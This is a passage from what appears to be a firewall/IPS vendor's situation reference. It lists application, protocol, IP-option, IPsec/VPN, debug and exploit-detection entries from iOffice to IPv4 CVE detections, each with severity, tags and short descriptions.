First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The iOffice helps to create, dispatch, track, analyze and report on everything from work orders to preventive maintenance tasks, assets, inventory and your technicians.
Back to top

Iomart

About this situation: Application Iomart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Iomart is cloud hosting and backup company.
Back to top

ion-interactive-marketing-apps-platform

About this situation: Application ion-interactive-marketing-apps-platform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ion interactive is used to differentiate brands, increase engagement and improve conversions in content marketing, social marketing, email marketing and advertising campaigns.
Back to top

Iongeo

About this situation: Application Iongeo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ION is a provider of technology-driven geoscience solutions to the global oil and gas industry. ION offerings are designed to help companies reduce risk and optimize assets throughout the Exploration and Production lifecycle.
Back to top

IOPCCommon

About this situation: MSRPC protocol traffic to IOPCCommon Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IOPCCommon Interface.
Back to top

IOPCEnumGUID

About this situation: MSRPC protocol traffic to IOPCEnumGUID Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IOPCEnumGUID Interface.
Back to top

IOPCServerList

About this situation: MSRPC protocol traffic to IOPCServerList Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IOPCServerList Interface.
Back to top

IOPCServerList2

About this situation: MSRPC protocol traffic to IOPCServerList2 Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IOPCServerList2 Interface.
Back to top

IOPCShutdown

About this situation: MSRPC protocol traffic to IOPCShutdown Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IOPCShutdown Interface. This Application requires engine version 5.7.4 or higher.
Back to top

IOXIDResolver

About this situation: MSRPC protocol traffic to IOXIDResolver Interface
Context: Application Context
Severity: 1
Tags: Protocols, OPC Auxiliary
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-746-5211
Description: MSRPC protocol traffic to IOXIDResolver (IObjectExporter) Interface. This DCOM interface is used for OXID resolution, pinging, and server aliveness tests. This Application requires engine version 5.7.4 or higher.
Back to top

IP Option Loose Source Route

About this situation: IPv4 datagram with Loose Source Route Option
Context: IP Option Detection
Severity: 2
Tags: Malicious Routing
First detected in: sgpkg-ips-69-1314
Last changed: sgpkg-ips-106-2032
Vulnerability: VxWorks-Stack-Overflow-Vulnerability-CVE-2019-12256
Description: A Loose Source and Record Route (LSRR) option [RFC 791] was detected. The LSRR option provides a means for the source of an internet datagram to supply routing information to be used by the gateways in forwarding the datagram to the destination, and to record the route information. Note: This situation is handled similarly to packet sanity situations, that is, all other matching constraints than the situation id are ignored. This situation has to be correlated in the log server context. As such, a packet with a LSRR option can be valid, and the option is even necessary for some network setups. The option can be useful in troubleshooting, as well. However, the option has many security implications. It is advisable to allow the option only if there is a real need for it. Risk analysis: - The LSRR option might allow bypassing of firewall rules, reaching of otherwise unreachable networks and discovering the topology of a network, among others. See RFC 6274 and RFC 7126 for further analysis. - Some versions of the Windows IP driver contain a vulnerability that allows a malformed LSRR option to cause a buffer overflow, potentially allowing arbitrary code execution. The Microsoft security bulletin MS06-032 addresses this issue. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP Option Record Route

About this situation: IPv4 datagram with Record Route Option
Context: IP Option Detection
Severity: 2
Tags: Malicious Routing
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1608-5242
Description: A Record Route (RR) option [RFC 791] was detected. The RR option provides a means to record the route of an internet datagram. Note: This situation is handled similarly to packet sanity situations, that is, all other matching constraints than the situation id are ignored. This situation has to be correlated in the log server context. As such, a packet with a RR option can be valid. The option can be useful for network troubleshooting, but it can be used for illegitimate information gathering, too. It is advisable to allow the option only if there is a real need for it. Risk analysis: - The RR option might allow discovering the topology of a network. However, the limited space in the IP header reduces the usefulness of the option for that purpose. See RFC 6274 and RFC 7126 for further analysis. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP Option Strict Source Route

About this situation: IPv4 datagram with Strict Source Route Option
Context: IP Option Detection
Severity: 2
Tags: Malicious Routing
First detected in: sgpkg-ips-69-1314
Last changed: sgpkg-ips-106-2032
Vulnerability: VxWorks-Stack-Overflow-Vulnerability-CVE-2019-12256
Description: A Strict Source and Record Route (SSRR) option [RFC 791] was detected. The SSRR option provides a means for the source of an internet datagram to supply routing information to be used by the gateways in forwarding the datagram to the destination, and to record the route information. Note: This situation is handled similarly to packet sanity situations, that is, all other matching constraints than the situation id are ignored. This situation has to be correlated in the log server context. As such, a packet with a SSRR option can be valid, and the option is even necessary for some network setups. The option can be useful in troubleshooting, as well. However, the option has many security implications. It is advisable to allow the option only if there is a real need for it. Risk analysis: - The SSRR option might allow bypassing of firewall rules, reaching of otherwise unreachable networks and discovering the topology of a network, among others. See RFC 6274 and RFC 7126 for further analysis. - Some versions of the Windows IP driver contain a vulnerability that allows a malformed SSRR option to cause a buffer overflow, potentially allowing arbitrary code execution. The Microsoft security bulletin MS06-032 addresses this issue. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP-Board

About this situation: Application IP-Board detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Invision Power Board is an Internet forum software produced by Invision Power Services, Inc. It is written in PHP and primarily uses MySQL as a database management system, although support for other database engines is available.
Back to top

IP-Messenger

About this situation: IP Messenger traffic
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-628-5211
Description: IP Messenger is an instant messaging application which allows a user to chat on LAN or network with other people if they are using the same software. It uses UDP port 2425 for messages send/receive, and TCP port 2425 for file transfer.
Back to top

IP-Multicast-Source

About this situation: IP packet with a multicast source address
Context: IP without parameters
Severity: 6
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1608-5242
Description: The IP packet's source address is a multicast address. Such a packet must never be generated by a well-behaved TCP/IP stack [RFC 1112, RFC 2373]. Note: This situation is triggered by an invalid packet, so all matching constraints other than the situation id are ignored and the action with routed packets is always discard, because the engine must not route invalid packets. With non routed link-layer packets, if the action is permit this packet is then passed without any further processing. Also please note that this situation must be correlated in the log server context. Risk analysis: Packets with a multicast address in the source address field might be used for a denial-of service attack. Combined with the TCP protocol, the misuse is known as the 'spank.c' multicast attack. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

Ipadio

About this situation: Application Ipadio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ipadio - interactive, multi-channel customer contact engine.
Back to top

Ipanematech

About this situation: Application Ipanematech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ipanema gives enterprises the full feature set of solutions they need to guarantee ERP, CRM and business application performance to every user regardless of the complexity of their IT
Back to top

IPERCEPTIONS

About this situation: iPerceptions usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: iPerceptions is reimagining digital customer research by evolving digital analytics, enriching marketing technologies and personalizing experiences in realtime.
Back to top

Iperf

About this situation: Iperf usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-759-5211
Description: Iperf is a network performance measurement tool. Iperf creates TCP and UDP data streams and measures the network's performance. The default port used by Iperf is 5001 for both TCP and UDP.
Back to top

Iperius-Backup

About this situation: Application Iperius-Backup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Iperius is a complete backup utility for Windows. Backup to Cloud and FTP, NAS - Tape/LTO.
Back to top

Ipipeline

About this situation: Application Ipipeline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iPipeline its industry in providing the next-generation suite of sales distribution software to the insurance and financial services markets through its on-demand service. iPipeline's channel solutions for carriers, distributors, and producers automate activities for CRM, forms distribution and processing, quotes and illustrations, in Good Order e-Applications, agency management, data services, policy delivery and related services, enabling the insurance industry to market, sell, and process faster.
Back to top

IPIPv6_Header-Short

About this situation: Unexpected end of IPIPv6 header
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Description: The IPIPv6 header was too short . Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPIP_Header-Short

About this situation: Unexpected end of IPIP header
Context: IP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Description: The IPIP header was too short . Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

iPlanner.NET

About this situation: Application iPlanner.NET detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iPlanner.NET is business planning software provided as an online service.
Back to top

iPlanWare

About this situation: Application iPlanWare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iPlanWare - online project management software and portfolio management.
Back to top

IPP

About this situation: Internet Printing Protocol usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-636-5211
Description: IPP provides a standard network protocol for remote printing.
Back to top

iPressroom

About this situation: Application iPressroom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: iPressroom - PR and Marketing content management system software makes it easy to engage influencers through your online newsroom, social media or digital press kit.
Back to top

IPSEC-CryptoPro-Failed

About this situation: CryptoPro IPsec failed
Context: VPN alert
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-564-5211
Description: CryptoPro IPsec error (see information message).
Back to top

IPsec-SA-Deleted

About this situation: IPsec SA Deleted
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IPsec SA was deleted.
Back to top

IPsec-SA-Expired

About this situation: IPsec SA Expired
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IPsec SA expired.
Back to top

IPsec-SA-Initiator-Done

About this situation: IPsec SA Initiator Done
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IPsec SA initiator negotiation was completed successfully.
Back to top

IPsec-SA-Initiator-Failed

About this situation: IPsec SA Initiator Failed
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IPsec SA initiator negotiation failed.
Back to top

IPsec-SA-Responder-Done

About this situation: IPsec SA Responder Done
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IPsec SA responder negotiation was completed successfully.
Back to top

IPsec-SA-Responder-Failed

About this situation: IPsec SA Responder Failed
Context: Internet Key Exchange
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: IPsec SA responder negotiation failed.
Back to top

IPSEC-VPN-Missing-Certificate

About this situation: VPN certificate is missing
Context: VPN alert
Severity: 10
Tags: VPN
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Description:
Back to top

IPSEC-VPN-Missing-Private-Key

About this situation: VPN certificate is missing private key
Context: VPN alert
Severity: 10
Tags: VPN
First detected in: sgpkg-ips-75-1314
Last changed: sgpkg-ips-106-2032
Description:
Back to top

IPSEC-VPN-PSK-Expired

About this situation: Pre-shared key has expired
Context: VPN alert
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Description:
Back to top

IPSEC_AH-ICV-Failure

About this situation: AH ICV Failure
Context: IPSEC
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: AH packet was dropped because the computed and received AH Integrity Check Value (ICV) did not match.
Back to top

IPSEC_AH-IP-Fragment

About this situation: AH Packet is IP Fragment
Context: IPSEC
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: AH packet was dropped because the packet appears to be an IP fragment.
Back to top

IPSEC_AH-SA-Lookup-Failure

About this situation: AH SA Lookup Failure
Context: IPSEC
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: AH packet was dropped because SA lookup failed.
Back to top

IPSEC_AH-SA-Sequence-Number-Failure

About this situation: AH Sequence Number Failure
Context: IPSEC
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: AH packet was dropped because the packet contained invalid Sequence Number
Back to top

IPSEC_AH-Sequence-Number-Overflow

About this situation: AH Packet Sequence Number Overflow
Context: IPSEC
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: AH packet was dropped because sending the packet would have resulted in Sequence Number Overflow.
Back to top

IPSEC_ESP-ICV-Failure

About this situation: ESP ICV Failure
Context: IPSEC
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: ESP packet was dropped because the computed and received ESP Integrity Check Value (ICV) did not match.
Back to top

IPSEC_ESP-IP-Fragment

About this situation: ESP Packet is IP Fragment
Context: IPSEC
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: ESP packet was dropped because the packet appears to be an IP fragment.
Back to top

IPSEC_ESP-SA-Lookup-Failure

About this situation: ESP SA Lookup Failure
Context: IPSEC
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: ESP packet was dropped because SA lookup failed.
Back to top

IPSEC_ESP-SA-Sequence-Number-Failure

About this situation: ESP Sequence Number Failure
Context: IPSEC
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: ESP packet was dropped because the packet contained invalid Sequence Number.
Back to top

IPSEC_ESP-Sequence-Number-Overflow

About this situation: ESP Sequence Number Overflow
Context: IPSEC
Severity: 8
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: ESP packet was dropped because sending the packet would have resulted in Sequence Number Overflow.
Back to top

Ipsfp_Debug-Assertion

About this situation: A special location in the stream was reported to matcher
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Description: This log record is a debug message indicating that a special location in the stream was reported to fingerprint matcher (such as end of stream).
Back to top

Ipsfp_Debug-Matcher-cloned

About this situation: A new fingerprint matcher was cloned
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Description: This log record is a debug message indicating that a new fingerprint matcher was cloned from an existing matcher.
Back to top

Ipsfp_Debug-Matcher-created

About this situation: A new fingerprint matcher was created
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Description: This log record is a debug message indicating that a new fingerprint matcher was created.
Back to top

Ipsfp_Debug-Matcher-deleted

About this situation: A fingerprint matcher was deleted
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Description: This log record is a debug message indicating that a fingerprint matcher was deleted.
Back to top

Ipsfp_Debug-Matcher-deserialized

About this situation: A fingerprint matcher was deserialized
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Description: This log record is a debug message indicating that a fingerprint matcher was deserialized.
Back to top

Ipsfp_Debug-Matcher-serialized

About this situation: A fingerprint matcher was serialized
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Description: This log record is a debug message indicating that a fingerprint matcher was serialized.
Back to top

Ipsfp_Debug-Missing-data

About this situation: Missing data in the stream was reported to matcher
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Description: This log record is a debug message indicating missing data was reported to fingerprint matcher.
Back to top

Ipsfp_Debug-New-data

About this situation: New data was fingerprinted
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Description: This log record is a debug message indicating that new data was fingerprinted.
Back to top

Ipswitch

About this situation: Application Ipswitch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ipswitch makes software for businesses to manage networks, securely transfer files, and communicate via e-mail, designed to increase productivity for people and organizations. Ipswitch products save time and money by being easy to learn, use, support and maintain.
Back to top

IPTV.BG

About this situation: IPTV.bg usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

IPv4_Cisco-IOS-Next-Hop-Resolution-Protocol-Vulnerability

About this situation: An attempt to exploit a vulnerability in Cisco IOS detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Cisco IOS, Any Hardware, CVE2007, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1193-5242
Vulnerability: Cisco-IOS-Next-Hop-Resolution-Protocol-Vulnerability
Description:
Back to top

IPv4_IGMPv3-Large-Membership-Query

About this situation: A large IGMPv3 membership query detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1191-5242
Description:
Back to top

IPv4_Linux-Kernel-DCCP-Protocol-Handler-DCCP_Setsockopt_Change-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2008, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Linux-Kernel-DCCP-Protocol-Handler-DCCP_Setsockopt_Change-Integer-Overflow
Description:
Back to top

IPv4_Linux-Kernel-IPv6-Over-IPv4-Memory-Leak-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2008, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-852-5242
Vulnerability: Linux-Kernel-IPv6-Over-IPv4-Memory-Leak-Denial-Of-Service
Description:
Back to top

IPv4_Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Red Hat Enterprise Linux, Any Hardware, CVE2014, Linux not specific, Red Hat Enterprise Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Vulnerability: Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service
Description:
Back to top

IPv4_Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Red Hat Enterprise Linux, Any Hardware, CVE2014, Linux not specific, Red Hat Enterprise Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Vulnerability: Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference
Description:
Back to top

IPv4_Linux-Kernel-SCTP-Chunkless-Packet-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2006, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Linux-Kernel-SCTP-Chunkless-Packet-Denial-Of-Service
Description:
Back to top

IPv4_Linux-Kernel-SCTP-Duplicate-Cookie-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2013, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Linux-Kernel-SCTP-Duplicate-Cookie-Handling-Denial-Of-Service
Description:
Back to top

IPv4_Linux-Kernel-SCTP-Fwd-Tsn-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2009, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Linux-Kernel-SCTP-Fwd-Tsn-Handling-Buffer-Overflow
Description:
Back to top

IPv4_Linux-Kernel-SCTP-Handshake-Cookie-Echo-Chunks-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2014, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Linux-Kernel-SCTP-Handshake-Cookie-Echo-Chunks-Null-Pointer-Dereference
Description:
Back to top

IPv4_Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2016, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Vulnerability: Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read
Description:
Back to top

IPv4_Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read-2

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2016, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Linux-Kernel-SCTP-SCTP_sf_Ootb-Out-Of-Bounds-Read
Description:
Back to top

IPv4_Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2014, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow
Description:
Back to top

IPv4_Linux-Kernel-SCTP_Process_UNK_Param-Sctpchunkinit-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Linux Kernel Organization Linux Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2010, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Linux-Kernel-SCTP_Process_UNK_Param-Sctpchunkinit-Buffer-Overflow
Description:
Back to top

IPv4_Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel Organization Linux Kernel detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2010, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-755-5211
Vulnerability: Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service
Description:
Back to top

IPv4_Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21689

About this situation: An attempt to exploit a vulnerability in Extensible Authentication Protocol (EAP) service detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, Extensible Authentication Protocol (EAP) service, MS2023-02, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1556-5242
Last changed: sgpkg-ips-1556-5242
